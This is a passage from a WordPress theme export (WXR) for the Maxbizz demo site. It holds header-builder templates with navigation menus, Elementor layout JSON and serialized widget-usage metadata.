:27:"icon_typography_line_height";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:6:"layout";a:3:{s:14:"section_layout";a:2:{s:6:"layout";i:2;s:16:"content_position";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}s:19:"header_custom_class";a:2:{s:12:"sticky_class";i:1;s:17:"sticky_background";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:6:"margin";i:1;s:7:"padding";i:2;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:2:{s:5:"style";a:2:{s:18:"style_menu_section";a:5:{s:10:"space_item";i:1;s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:25:"menu_typography_font_size";i:1;s:27:"menu_typography_font_weight";i:1;}s:19:"style_smenu_section";a:1:{s:27:"smenu_typography_typography";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}s:7:"ibutton";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"button_section";a:2:{s:4:"text";i:1;s:4:"link";i:1;}}s:5:"style";a:1:{s:13:"style_section";a:1:{s:6:"btn_bg";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header Mobile - Logo Center</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-mobile-logo-center/</link>
		<pubDate>Sat, 23 May 2020 11:00:49 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=168</guid>
		<description></description>
		<content:encoded><![CDATA[<button></button>
						<a href="#"></a>
							<ul id="menu-main-menu"><li id="menu-item-1291"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1292"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1320"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/about-us/">About Us</a></li>
	<li id="menu-item-1342"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Our Services 1</a></li>
	<li id="menu-item-1337"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1326"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1327"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/">Our Team</a></li>
	<li id="menu-item-1328"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1324"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/elements/">Elements</a></li>
	<li id="menu-item-1329"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/typography/">Typography</a></li>
	<li id="menu-item-1325"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/faqs/">FAQs</a></li>
	<li id="menu-item-1321"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/404-2/">404</a></li>
	<li id="menu-item-1322"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1340"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1343"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1341"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1339"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1346"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1338"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/">Services</a>
<ul>
	<li id="menu-item-1336"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1335"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1334"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1333"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1332"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1331"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1330"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog</a>
<ul>
	<li id="menu-item-1344"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/blog/">Blog List</a></li>
	<li id="menu-item-1345"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1323"><a href="http://wpdemo.archiwp.com/maxbizz-consulting/contacts/">Contacts</a></li>
</ul>						   	
				<a href="http://wpdemo.archiwp.com/maxbizz-consulting/">
					<img src="https://maxbizz.s3.amazonaws.com/images/02_Black.svg" alt="Maxbizz Consulting">
				</a>			        
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>168</wp:post_id>
		<wp:post_date><![CDATA[2020-05-23 11:00:49]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-05-23 11:00:49]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-mobile-logo-center]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.11]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"d17082b","elType":"section","settings":{"structure":"30","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"cd86fb1","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_mobile":30,"_ot_content_align":"horizontal"},"elements":[{"id":"82c9ed8","elType":"widget","settings":{"nav_menu":"main-menu","icon_color":"#000000","pos_menu":"on-left"},"elements":[],"widgetType":"imenu_mobile"}],"isInner":false},{"id":"331e8c4","elType":"column","settings":{"_column_size":33,"_inline_size":null,"_inline_size_mobile":40},"elements":[{"id":"9b03ba7","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02_Black.svg","id":350},"_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"align":"center","logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"1f2ae1c","elType":"column","settings":{"_column_size":33,"_inline_size":null,"align":"flex-end","_ot_content_align":"horizontal","_inline_size_mobile":30},"elements":[{"id":"5b15a8e","elType":"widget","settings":{"icon_color":"#000000","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"22","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-07-23]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:12:"imenu_mobile";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:7:"content";a:1:{s:15:"content_section";a:1:{s:8:"pos_menu";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:4:{s:12:"_inline_size";i:3;s:19:"_inline_size_mobile";i:3;s:17:"_ot_content_align";i:2;s:5:"align";i:1;}}}}s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:2:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:10:"logo_image";i:1;s:5:"align";i:1;s:10:"logo_width";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_icon_section";a:1:{s:10:"icon_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:1;s:8:"_padding";i:1;}}}}s:7:"section";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:6:"layout";a:1:{s:17:"section_structure";a:1:{s:9:"structure";i:1;}}s:5:"style";a:1:{s:14:"section_border";a:2:{s:26:"box_shadow_box_shadow_type";i:1;s:21:"box_shadow_box_shadow";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 3</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-3/</link>
		<pubDate>Fri, 24 Jul 2020 03:48:42 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=182</guid>
		<description></description>
		<content:encoded><![CDATA[<a href="http://wpdemo.archiwp.com/maxbizz-business/">
					<img src="https://maxbizz.s3.amazonaws.com/images/03_White.svg" alt="Maxbizz Business">
				</a>			        
				<a href="tel:+1-800-456-478-23">
				

	
		
	

				</a>
				<h6>
					<a href="tel:+1-800-456-478-23">Have Any Questions?</a>
				</h6>
								<p>+1-800-456-478-23</p>
				

	
		
	

				
				<h6>
					Visit Us Daily
				</h6>
								<p>411 University St, Seattle</p>
								
				<h6>
					Our Working Hours
				</h6>
								<p>Mon - Sat: 8.00 - 18.00</p>
						<nav id="site-navigation">			
				<ul id="primary-menu"><li id="menu-item-1432"><a href="http://wpdemo.archiwp.com/maxbizz-consulting">Home</a></li>
<li id="menu-item-1433"><a href="#">Pages</a>
<ul>
	<li id="menu-item-1537"><a href="http://wpdemo.archiwp.com/maxbizz-business/about-us/">About Us</a></li>
	<li id="menu-item-1559"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/">Our Services 1</a></li>
	<li id="menu-item-1554"><a href="http://wpdemo.archiwp.com/maxbizz-business/services-with-icon/">Our Services 2</a></li>
	<li id="menu-item-1543"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-core-values/">Our Core Values</a></li>
	<li id="menu-item-1544"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-team/">Our Team</a></li>
	<li id="menu-item-1545"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-team/single-team/">Single Team</a></li>
	<li id="menu-item-1541"><a href="http://wpdemo.archiwp.com/maxbizz-business/elements/">Elements</a></li>
	<li id="menu-item-1546"><a href="http://wpdemo.archiwp.com/maxbizz-business/typography/">Typography</a></li>
	<li id="menu-item-1542"><a href="http://wpdemo.archiwp.com/maxbizz-business/faqs/">FAQs</a></li>
	<li id="menu-item-1538"><a href="http://wpdemo.archiwp.com/maxbizz-business/404-2/">404</a></li>
	<li id="menu-item-1539"><a href="http://wpdemo.archiwp.com/maxbizz-business/coming-soon/">Coming Soon</a></li>
</ul>
</li>
<li id="menu-item-1557"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/">Portfolio</a>
<ul>
	<li id="menu-item-1560"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-grid/">Portfolio Grid</a></li>
	<li id="menu-item-1558"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-masonry/">Portfolio Masonry</a></li>
	<li id="menu-item-1556"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio-carousel/">Portfolio Carousel</a></li>
	<li id="menu-item-1563"><a href="http://wpdemo.archiwp.com/maxbizz-business/portfolio/digital-marketing/">Portfolio Details</a></li>
</ul>
</li>
<li id="menu-item-1555"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/">Services</a>
<ul>
	<li id="menu-item-1553"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/marketing-research/">Marketing Research</a></li>
	<li id="menu-item-1552"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/organizational-audit/">Organizational Audit</a></li>
	<li id="menu-item-1551"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/business-consulting/">Business Consulting</a></li>
	<li id="menu-item-1550"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/project-management/">Project Management</a></li>
	<li id="menu-item-1549"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/support-function/">Support Function</a></li>
	<li id="menu-item-1548"><a href="http://wpdemo.archiwp.com/maxbizz-business/our-services/finance-planning/">Finance Planning</a></li>
</ul>
</li>
<li id="menu-item-1547"><a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">Blog</a>
<ul>
	<li id="menu-item-1561"><a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">Blog List</a></li>
	<li id="menu-item-1562"><a href="http://wpdemo.archiwp.com/maxbizz-business/2020/02/24/the-future-of-retail-asias-ecosystems/">Blog Post</a></li>
</ul>
</li>
<li id="menu-item-1540"><a href="http://wpdemo.archiwp.com/maxbizz-business/contacts/">Contacts</a></li>
</ul>			</nav>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>
					<a href="#" target="_blank" rel="noopener noreferrer">
						Instagram
											</a>
				<!-- Form Search on Header -->
						
    <label>Search for:
    </label>
	<button type="submit"></button>
    ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>182</wp:post_id>
		<wp:post_date><![CDATA[2020-07-24 03:48:42]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-07-24 03:48:42]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[header-3]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_header_builders]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[elementor_canvas]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.12]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"15f82ce","elType":"section","settings":{"content_position":"middle","structure":"20","padding":{"unit":"px","top":"17","right":"0","bottom":"48","left":"0","isLinked":false},"background_background":"classic","background_color":"#282828","box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"}},"elements":[{"id":"d78080f","elType":"column","settings":{"_column_size":50,"_inline_size":20},"elements":[{"id":"2b1b8bd","elType":"widget","settings":{"logo_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03_White.svg","id":377},"logo_width":{"unit":"px","size":140,"sizes":[]}},"elements":[],"widgetType":"ilogo"}],"isInner":false},{"id":"d4b56e5","elType":"column","settings":{"_column_size":50,"_inline_size":80,"_ot_content_align":"horizontal","align":"flex-end"},"elements":[{"id":"cd56b26","elType":"widget","settings":{"title_text":"Have Any Questions?","description_text":"+1-800-456-478-23","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/call.svg","id":345},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"0","isLinked":false},"link":{"url":"tel:+1-800-456-478-23","is_external":"","nofollow":"","custom_attributes":""}},"elements":[],"widgetType":"icon-box"},{"id":"3c30484","elType":"widget","settings":{"title_text":"Visit Us Daily","description_text":"411 University St, Seattle","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":24,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/pin.svg","id":347},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"},{"id":"74c4536","elType":"widget","settings":{"title_text":"Our Working Hours","description_text":"Mon - Sat: 8.00 - 18.00","position":"left","title_size":"h6","primary_color":"#D92300","icon_size":{"unit":"px","size":22,"sizes":[]},"rotate":{"unit":"deg","size":"","sizes":[]},"content_vertical_alignment":"middle","title_bottom_space":{"unit":"px","size":0,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":14,"sizes":[]},"title_typography_font_weight":"400","description_typography_typography":"custom","description_typography_font_size":{"unit":"px","size":15,"sizes":[]},"description_typography_font_weight":"600","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/symbol.svg","id":356},"library":"svg"},"title_color":"#A5A5A5","title_typography_font_family":"Open Sans","description_color":"#FFFFFF","description_typography_font_family":"Open Sans","_margin":{"unit":"px","top":"4","right":"0","bottom":"0","left":"60","isLinked":false}},"elements":[],"widgetType":"icon-box"}],"isInner":false}],"isInner":false},{"id":"3346a7f","elType":"section","settings":{"content_width":{"unit":"px","size":1280,"sizes":[]},"background_background":"classic","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"margin":{"unit":"px","top":"-33","right":0,"bottom":"-40","left":0,"isLinked":false}},"elements":[{"id":"7fae78a","elType":"column","settings":{"_column_size":100,"_inline_size":null,"content_position":"center","align":"flex-end","_ot_column_min_width":{"unit":"px","size":220,"sizes":[]},"_ot_content_align":"horizontal"},"elements":[{"id":"4d3a690","elType":"section","settings":{"layout":"full_width","structure":"20","background_background":"classic","background_color":"#FFFFFF","border_radius":{"unit":"px","top":"3","right":"3","bottom":"3","left":"3","isLinked":true},"box_shadow_box_shadow_type":"yes","box_shadow_box_shadow":{"horizontal":15,"vertical":15,"blur":38,"spread":0,"color":"rgba(0, 0, 0, 0.1)"},"padding":{"unit":"px","top":"0","right":"40","bottom":"0","left":"40","isLinked":false}},"elements":[{"id":"911d327","elType":"column","settings":{"_column_size":50,"_inline_size":74.957999999999998408384271897375583648681640625,"_ot_content_align":"horizontal"},"elements":[{"id":"82c5870","elType":"widget","settings":{"nav_menu":"main-menu","text_hover_color":"#D92300","menu_typography_typography":"custom","menu_typography_font_family":"Raleway","menu_typography_font_weight":"700"},"elements":[],"widgetType":"imenu"}],"isInner":true},{"id":"e0ea046","elType":"column","settings":{"_column_size":50,"_inline_size":25.042000000000001591615728102624416351318359375,"align":"flex-end","_ot_content_align":"horizontal"},"elements":[{"id":"9e80548","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"0d77827","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"#02010100","__globals__":{"item_icon_primary_color":""}},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"04b0949","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"d468e5b","link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)"},{"social_icon":{"value":"fab fa-instagram","library":"fa-brands"},"link":{"url":"#","is_external":"true","nofollow":"","custom_attributes":""},"item_icon_color":"custom","item_icon_primary_color":"rgba(2, 1, 1, 0)","_id":"e7140d6"}],"shape":"circle","align":"","icon_size":{"unit":"px","size":13,"sizes":[]},"icon_padding":{"unit":"em","size":0.5,"sizes":[]},"icon_spacing":{"unit":"px","size":8,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"#C9C9C9","_padding":{"unit":"px","top":"22","right":"0","bottom":"22","left":"0","isLinked":false},"icon_color":"custom","hover_primary_color":"#D92300","hover_border_color":"#D92300","icon_secondary_color":"#373737","hover_secondary_color":"#FFFFFF"},"elements":[],"widgetType":"social-icons"},{"id":"60be152","elType":"widget","settings":{"bg_btn":"#D92300","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"40","isLinked":false}},"elements":[],"widgetType":"isearch"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:7:{s:5:"ilogo";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:7:"content";a:1:{s:15:"content_section";a:2:{s:10:"logo_image";i:1;s:10:"logo_width";i:1;}}}}s:6:"column";a:3:{s:5:"count";i:5;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:5:{s:12:"_inline_size";i:5;s:17:"_ot_content_align";i:4;s:5:"align";i:3;s:16:"content_position";i:1;s:20:"_ot_column_min_width";i:1;}}}}s:8:"icon-box";a:3:{s:5:"count";i:3;s:15:"control_percent";i:8;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:6:{s:10:"title_text";i:3;s:16:"description_text";i:3;s:8:"position";i:3;s:10:"title_size";i:3;s:13:"selected_icon";i:3;s:4:"link";i:1;}}s:5:"style";a:2:{s:18:"section_style_icon";a:3:{s:13:"primary_color";i:3;s:9:"icon_size";i:3;s:6:"rotate";i:3;}s:21:"section_style_content";a:12:{s:26:"content_vertical_alignment";i:3;s:18:"title_bottom_space";i:3;s:27:"title_typography_typography";i:3;s:26:"title_typography_font_size";i:3;s:28:"title_typography_font_weight";i:3;s:33:"description_typography_typography";i:3;s:32:"description_typography_font_size";i:3;s:34:"description_typography_font_weight";i:3;s:11:"title_color";i:3;s:28:"title_typography_font_family";i:3;s:17:"description_color";i:3;s:34:"description_typography_font_family";i:3;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:3;}}}}s:7:"section";a:3:{s:5:"count";i:3;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:16:"content_position";i:1;s:6:"layout";i:1;s:13:"content_width";i:1;}s:17:"section_structure";a:1:{s:9:"structure";i:2;}}s:8:"advanced";a:1:{s:16:"section_advanced";a:2:{s:7:"padding";i:2;s:6:"margin";i:1;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:3;s:16:"background_color";i:2;}s:14:"section_border";a:3:{s:26:"box_shadow_box_shadow_type";i:2;s:21:"box_shadow_box_shadow";i:3;s:13:"border_radius";i:1;}}}}s:5:"imenu";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:1:{s:5:"style";a:1:{s:18:"style_menu_section";a:4:{s:16:"text_hover_color";i:1;s:26:"menu_typography_typography";i:1;s:27:"menu_typography_font_family";i:1;s:27:"menu_typography_font_weight";i:1;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:7;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:5:"shape";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:8:{s:9:"icon_size";i:1;s:12:"icon_padding";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:10:"icon_color";i:1;s:20:"icon_secondary_color";i:1;}s:20:"section_social_hover";a:3:{s:19:"hover_primary_color";i:1;s:18:"hover_border_color";i:1;s:21:"hover_secondary_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"isearch";a:3:{s:5:"count";i:1;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:5:"style";a:1:{s:18:"style_form_section";a:1:{s:6:"bg_btn";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:7:"_margin";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Header 4</title>
		<link>http://wpdemo.archiwp.com/maxbizz-corporate/ot_header_builders/header-4/</link>
		<pubDate>Fri, 24 Jul 2020 06:55:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://localhost/maxbizz/?post_type=ot_header_builders&#038;p=217</guid>
		<description></description>
		<content:encoded><![CDATA[<ul>
							<li>
